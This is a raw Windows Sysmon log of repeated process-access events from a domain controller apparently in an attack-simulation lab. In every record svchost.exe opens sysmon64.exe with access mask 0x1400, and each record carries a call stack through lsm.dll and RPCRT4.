13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
